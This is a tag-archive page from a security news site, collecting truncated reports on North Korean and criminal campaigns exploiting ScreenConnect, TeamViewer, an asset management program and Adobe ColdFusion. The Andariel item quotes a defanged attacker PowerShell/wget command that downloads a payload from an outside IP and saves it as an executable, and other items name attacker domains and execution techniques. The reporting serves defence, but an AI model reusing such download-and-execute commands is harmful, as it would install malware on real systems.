Tag Archive for: Deploy

Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware

/in


Mar 05, 2024NewsroomMalware / Cyber Threat

North Korean threat actors have exploited the recently disclosed security flaws in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK.

According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with known Kimsuky malware such as BabyShark and ReconShark.

“The threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application,” security researchers Keith Wojcieszek, George Glass, and Dave Truman said.

“They then leveraged their now ‘hands on keyboard’ access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware.”

Cybersecurity

The ConnectWise flaws in question are CVE-2024-1708 and CVE-2024-1709, which came to light last month and have since come under heavy exploitation by multiple threat actors to deliver cryptocurrency miners, ransomware, remote access trojans, and stealer malware.

Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent being GoBear and Troll Stealer.

BabyShark, first discovered in late 2018, is launched using an HTML Application (HTA) file. Once launched, the VB script malware exfiltrates system information to a command-and-control (C2) server, maintains persistence on the system, and awaits further instruction from the operator.

Then in May 2023, a variant of BabyShark dubbed ReconShark was observed being delivered to specifically targeted individuals through spear-phishing emails. TODDLERSHARK is assessed to be the latest evolution of the same malware due to code and behavioral similarities.

The malware, besides using a scheduled task for persistence, is engineered to capture and exfiltrate sensitive information about the compromised hosts, thereby acting as a valuable reconnaissance tool.

TODDLERSHARK “exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generate C2 URLs, which could make this malware hard to detect in…

Source…

TeamViewer Exploited to Obtain Remote Access, Deploy Ransomware

/in


The cybersecurity researchers at Huntress have issued a warning about a recent surge in cyber attacks, highlighting a new strategy employed by cybercriminals who are exploiting TeamViewer to deploy LockBit ransomware.

TeamViewer has a history of being exploited in large-scale cyber attacks. Recently, once again, cybersecurity experts have observed a surprising surge in cybercriminals’ attempts to exploit TeamViewer, a trusted remote access tool, to deploy LockBit ransomware, potentially exposing users to data encryption and extortion demands.

Researchers claim attackers exploit vulnerabilities in TeamViewer to gain initial access to victim devices and then deploy the aggressive LockBit ransomware, which encrypts critical files and demands substantial ransom payments for decryption.

Although infections were either contained or averted, no ransomware operation has been officially associated with the intrusions. The payload resembled LockBit ransomware encryptors. It is worth noting that in 2022, the ransomware builder for LockBit 3.0 was leaked, allowing the Bl00dy and Buhti gangs to launch their campaigns.

For your information, TeamViewer is a popular remote access tool in the enterprise world. Unfortunately, it has been exploited by scammers and ransomware actors to access remote desktops and execute malicious files for years. In March 2016, numerous victims reported their devices being breached via TeamViewer and attempts made to encrypt files with the Surprise ransomware.

Back then, TeamViewer’s unauthorized access was attributed to credential stuffing, where attackers used users’ leaked credentials instead of exploiting a zero-day vulnerability.

The software vendor explained that online criminals often log on with compromised accounts to find corresponding accounts with the same credentials, potentially allowing them to access all assigned devices for malware or ransomware installation.

The latest analysis from Huntress SOC analysts reveals that cybercriminals continue to use old techniques, abusing TeamViewer to take over devices and deploy ransomware. In one of the instances, as observed by Huntress, a single threat actor used TeamViewer to…

Source…

Hackers Exploit Asset Management Program to Deploy Malware

/in


The Andariel group has been identified in recent reports as distributing malware through asset management programs. This group has been previously discovered to be in a relationship with the Lazarus group.

The Andariel group is known to launch supply chain, spear phishing, or watering hole attacks as part of their initial access.

The group’s recent targets were Log4Shell and Innorix agents, which were targeted for attacking several corporate sectors in South Korea. In another case, the MS-SQL server was also identified to be targeted for malware attack. 

The malware used for attacks includes TigerRAT, NukeSped variants, Black RAT, and Lilith RAT. Similar to their previous attacks, their primary targets were South Korean communications companies and semiconductor manufacturers.

Document

Free Webinar

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked. The session will cover: an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway

Hackers Exploit Asset Management Program

Initial Access

In one case, an asset management program was targeted, which was identified with several logs.

This program was installed with Andariel group’s malware, which used the below PowerShell command for downloading the malware by using the mshta.exe process.

Powershell command used (Source: AhnLab)

PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe

Malware Used in Attacks

Some of the most used backdoors installed were TigerRAT, Black RAT, and NukeSped.

However, in recent attacks, an Open source malware named Lilith RAT was used. In other cases, malware developed in the Go language was also discovered. 

TigerRAT

This malware supports various features like uploading and downloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port forwarding.

This backdoor has an authentication process during initial communications, making it different from other backdoors.

Golang Downloader

Source…

Hackers Exploit Adobe ColdFusion Vulnerabilities to Deploy Malware

/in


  • Remote attackers can exploit pre-authentication RCE vulnerabilities in Adobe ColdFusion 2021 to seize control of affected systems.
  • Adobe has released security patches to address these vulnerabilities, but attackers are still exploiting them.
  • The attack campaign involves multiple stages, including probing, reverse shells, and the deployment of malware.
  • Four distinct malware strains have been identified: XMRig Miner, Satan DDoS/Lucifer, RudeMiner, and BillGates/Setag backdoor.
  • Users are advised to upgrade their systems promptly and deploy protection mechanisms to thwart ongoing attacks.

Numerous users of both Windows and macOS platforms are currently at risk due to vulnerabilities present in Adobe ColdFusion. This software suite, a popular choice for web application development, recently came under attack as remote attackers discovered and exploited pre-authentication remote code execution (RCE) vulnerabilities. Such vulnerabilities granted attackers the ability to seize control of affected systems, raising the alarm to a critical severity level.

The crux of these attacks targets the WDDX deserialization process within Adobe ColdFusion 2021. While Adobe responded swiftly with security updates (APSB23-40, APSB23-41, and APSB23-47), FortiGuard Labs observed continued exploitation attempts. 

An analysis of the attack patterns uncovered a process executed by the threat actors. They initiated probing activities using tools like “interactsh” to test the exploit’s effectiveness. These activities were observed involving multiple domains including mooo-ngcom, redteamtf, and h4ck4funxyz. The probing phase provided attackers insights into potential vulnerabilities and served as a precursor to more malicious actions.

The attack campaign’s sophistication extended to the utilization of reverse shells. By encoding payloads in Base64, attackers sought to gain unauthorized access to victim systems, enabling remote control. 

Notably, the analysis disclosed a multi-pronged approach, including the deployment of various malware variants. Attacks were launched from distinct IP addresses, raising concerns about the campaign’s widespread reach. Malware payloads were encoded…

Source…